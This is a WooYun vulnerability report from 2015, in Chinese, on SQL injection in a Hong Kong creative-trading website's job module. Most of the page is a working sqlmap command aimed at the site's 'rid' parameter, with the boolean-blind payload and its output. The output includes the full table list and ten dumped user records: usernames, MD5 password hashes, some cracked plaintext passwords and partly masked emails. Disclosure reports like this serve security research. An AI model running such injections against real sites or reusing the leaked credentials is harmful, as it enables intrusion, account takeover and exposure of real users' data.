乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经主动忽略漏洞,细节向公众公开
香港創意交易平台主站存在SQL注射漏洞(1W多名用户密码与邮箱)
地址:http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883
$ python sqlmap.py -u "http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883" -p rid --technique=B --random-agent --batch --no-cast -Danyidea_anyidea01 -T xoops_users -C uname,pass,name,email --dump --start 1 --stop 10
back-end DBMS: MySQL 5Database: anyidea_anyidea01+-------------+---------+| Table | Entries |+-------------+---------+| xoops_users | 10364 |+-------------+---------+
Database: anyidea_anyidea01Table: xoops_users[10 entries]+-------------+-------------------------------------------+------+---------------------------+| uname | pass | name | email |+-------------+-------------------------------------------+------+---------------------------+| yan_mcmug | 1610d99bbd13b300487c992cf35fa29c | | keit10k@**.**.**.** || nurikodomto | bb12b3dcc45be59fc8bde152a5e2d319 | | trobyjustice@**.**.**.** || leungkar | 1eaaaeebba29787989af2819ca811bbc | | handsomejoeyam@**.**.**.** || Vencent | bcbda11e419cca4dca93e0232bcf1ef1 | | tri_s@**.**.**.** || fly_design | c27b91c76443289c5754054bb0aad1cf | | greybird406@**.**.**.** || greatmoment | b427ebd39c845eb5417b7f7aaf1f9724 (zxcvbn) | | hksy151@**.**.**.** || otto | a152e841783914146e4bcd4f39100686 (asdfgh) | | shan5432@**.**.**.** || wilsonho | 990a1aeb1f5630064e5308716c308583 (102901) | | yumeinana@**.**.**.** || gallium | 2235c41b8801fd450bc252961b4d40c0 | | joey_lo_88@**.**.**.** || S.Y | 439cbba42741be50eff62c68880e86af | | kevinleelck@**.**.**.** |+-------------+-------------------------------------------+------+---------------------------+
current user: 'anyidea_anyidea@localhost'current user is DBA: Falsedatabase management system users [1]:[*] 'anyidea_anyidea'@'localhost'Database: anyidea_anyidea01+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| xoops_users_attributes | 39938 || xoops_anyidea_event | 32202 || xoops_jobs_resume | 17223 || xoops_users | 10364 || cdb_memberfields | 10352 || cdb_members | 10352 || xoops_groups_users_link | 10343 || xoops_users_20130711 | 8074 || cdb_posts | 6030 || xoops_xoopscomments | 4893 || cdb_attachments | 4573 || cdb_mythreads | 4217 || cdb_threads | 4037 || xoops_jobs_transaction | 3783 || check_code | 3298 || xoops_jobs_jobfaq | 3115 || xoops_jobs_vote | 1991 || cdb_onlinetime | 1666 || xoops_group_permission | 1567 || cdb_myposts | 1466 || xoops_users_auth | 1425 || xoops_catads_ads | 1133 || xoops_priv_msgs | 974 || xoops_jobs_listing | 941 || xoops_session | 512 || xoops_avatar | 495 || xoops_avatar_user_link | 495 || xoops_users_backup | 465 || cdb_rsscaches | 293 || xoops_xfguestbook_country | 240 || xoops_catads_departements | 237 || xoops_config | 233 || xoops_jobs_rss | 224 || xoops_configoption | 207 || xoops_stories | 193 || cdb_settings | 187 || cdb_statvars | 169 || xoops_tplfile | 147 || cdb_searchindex | 140 || xoops_lt_config | 139 || xoops_tplsource | 136 || supe_effects | 125 || supe_cache | 114 || cdb_threadsmod | 104 || cms_join_event | 96 || xoops_lt_users_permissions | 93 || xoops_lt_referers | 86 || xoops_catads_cat | 85 || cdb_subscriptions | 79 || xoops_lt_bayesian_tokens | 72 || supe_categories | 69 || xoops_lt_permissions | 66 || xoops_block_module_link | 61 || supe_settings | 59 || xoops_newblocks | 57 || cdb_polloptions | 53 || cdb_stats | 50 || xoops_catads_feedback | 48 || cdb_blogcaches | 44 || cdb_favorites | 40 || xoops_xoopsnotifications | 38 || cdb_pms | 37 || supe_prefields | 37 || xoops_users_industry | 36 || cdb_stylevars | 34 || xoops_jobs_categories | 32 || cdb_smilies | 29 || xoops_lt_article_categories_link | 28 || xoops_lt_articles | 28 || xoops_lt_articles_text | 28 || xoops_counter | 24 || cdb_forumfields | 23 || cdb_forums | 23 || cdb_moderators | 23 || xoops_catads_regions | 23 || supe_styles | 20 || xoops_content | 20 || xoops_smiles | 17 || cdb_usergroups | 15 || xoops_catads_options | 14 || xoops_smartfaq_answers | 14 || cdb_polls | 13 || xoops_smartfaq_faq | 12 || cdb_crons | 11 || xoops_lt_articles_categories | 11 || cdb_medals | 10 || cdb_sessions | 10 || cms_event_talk | 10 || supe_crons | 10 || xoops_modules | 10 || cms_event | 9 || supe_usergroups | 9 || cdb_bbcodes | 7 || cdb_buddys | 7 || xoops_configcategory | 7 || xoops_ranks | 7 || xoops_stats_userscreen | 7 || cdb_ratelog | 6 || supe_attachmenttypes | 6 || xoops_banner | 6 || xoops_bb_reads_forum | 6 || xoops_groups | 6 || xoops_lt_bayesian_filter_info | 6 || xoops_lt_blogs | 6 || xoops_xfguestbook_config | 6 || cdb_ranks | 5 || xoops_bb_forums | 5 || xoops_jobs_status | 5 || xoops_lt_articles_comments | 5 || xoops_smartfaq_categories | 5 || xoops_stats_usercolor | 5 || cdb_onlinelist | 4 || xoops_jobs_ttype | 4 || xoops_users_class | 4 || cdb_admingroups | 3 || xoops_bannerclient | 3 || cdb_adminsessions | 2 || cdb_failedlogins | 2 || cdb_words | 2 || xoops_bb_categories | 2 || xoops_bb_online | 2 || xoops_bb_reads_topic | 2 || xoops_ctem_pagelink | 2 || xoops_jobs_price | 2 || xoops_jobs_type | 2 || xoops_lt_users | 2 || xoops_online | 2 || xoops_topics | 2 || cdb_profilefields | 1 || cdb_styles | 1 || cdb_templates | 1 || cdb_threadtypes | 1 || cms_sys | 1 || cms_user | 1 || supe_robots | 1 || xoops_bannerfinish | 1 || xoops_bb_posts | 1 || xoops_bb_posts_text | 1 || xoops_bb_topics | 1 || xoops_imagecategory | 1 || xoops_imgset | 1 || xoops_imgset_tplset_link | 1 || xoops_jobs_res_categories | 1 || xoops_stories_votedata | 1 || xoops_tplset | 1 || xoops_xfguestbook_msg | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 2490 || STATISTICS | 651 || GLOBAL_STATUS | 291 || SESSION_STATUS | 291 || GLOBAL_VARIABLES | 277 || SESSION_VARIABLES | 277 || PARTITIONS | 275 || TABLES | 275 || KEY_COLUMN_USAGE | 250 || TABLE_CONSTRAINTS | 232 || COLLATION_CHARACTER_SET_APPLICABILITY | 130 || COLLATIONS | 129 || CHARACTER_SETS | 36 || SCHEMA_PRIVILEGES | 18 || PLUGINS | 7 || ENGINES | 5 || SCHEMATA | 3 || PROCESSLIST | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: anyidea_anyidea01Table: xoops_users_20130711[1 column]+--------+| Column |+--------+| pass |+--------+Database: anyidea_anyidea01Table: supe_members[1 column]+----------+| Column |+----------+| password |+----------+Database: anyidea_anyidea01Table: cms_sys[1 column]+----------+| Column |+----------+| password |+----------+Database: anyidea_anyidea01Table: xoops_users[1 column]+--------+| Column |+--------+| pass |+--------+Database: anyidea_anyidea01Table: cdb_members[1 column]+----------+| Column |+----------+| password |+----------+Databsqlmap resumed the following injection point(s) from stored session:---Parameter: rid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pa=viewResume&rid=00000000883 AND 5794=5794---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5Database: anyidea_anyidea01+-------------+---------+| Table | Entries |+-------------+---------+| xoops_users | 10364 |+-------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: rid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pa=viewResume&rid=00000000883 AND 5794=5794---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5Database: anyidea_anyidea01Table: xoops_users[37 columns]+-----------------+-----------------------+| Column | Type |+-----------------+-----------------------+| level | tinyint(3) unsigned || actkey | varchar(8) || attachsig | tinyint(1) unsigned || bio | tinytext || class | tinyint(3) unsigned || contact | varchar(100) || email | varchar(60) || industry | tinyint(4) || last_login | int(10) unsigned || name | varchar(60) || notify_method | tinyint(1) || notify_mode | tinyint(1) || pass | varchar(32) || points_con | int(10) unsigned || points_pro | int(10) unsigned || posts | mediumint(8) unsigned || rank | smallint(5) unsigned || tel | varchar(50) || theme | varchar(100) || timezone_offset | float(3,1) || uid | mediumint(8) unsigned || umode | varchar(10) || uname | varchar(25) || uorder | tinyint(1) unsigned || url | varchar(100) || user_aim | varchar(18) || user_avatar | varchar(30) || user_from | varchar(100) || user_icq | varchar(15) || user_intrest | varchar(150) || user_mailok | tinyint(1) unsigned || user_msnm | varchar(100) || user_occ | varchar(100) || user_regdate | int(10) unsigned || user_sig | tinytext || user_viewemail | tinyint(1) unsigned || user_yim | varchar(25) |+-----------------+-----------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: rid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pa=viewResume&rid=00000000883 AND 5794=5794---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5Database: anyidea_anyidea01Table: xoops_users[10 entries]+-------------+-------------------------------------------+------+---------------------------+| uname | pass | name | email |+-------------+-------------------------------------------+------+---------------------------+| yan_mcmug | 1610d99bbd13b300487c992cf35fa29c | | keit10k@**.**.**.** || nurikodomto | bb12b3dcc45be59fc8bde152a5e2d319 | | trobyjustice@**.**.**.** || leungkar | 1eaaaeebba29787989af2819ca811bbc | | handsomejoeyam@**.**.**.** || Vencent | bcbda11e419cca4dca93e0232bcf1ef1 | | tri_s@**.**.**.** || fly_design | c27b91c76443289c5754054bb0aad1cf | | greybird406@**.**.**.** || greatmoment | b427ebd39c845eb5417b7f7aaf1f9724 (zxcvbn) | | hksy151@**.**.**.** || otto | a152e841783914146e4bcd4f39100686 (asdfgh) | | shan5432@**.**.**.** || wilsonho | 990a1aeb1f5630064e5308716c308583 (102901) | | yumeinana@**.**.**.** || gallium | 2235c41b8801fd450bc252961b4d40c0 | | joey_lo_88@**.**.**.** || S.Y | 439cbba42741be50eff62c68880e86af | | kevinleelck@**.**.**.** |+-------------+-------------------------------------------+------+---------------------------+
上WAF。
危害等级:无影响厂商忽略
忽略时间:2015-12-08 11:36
暂无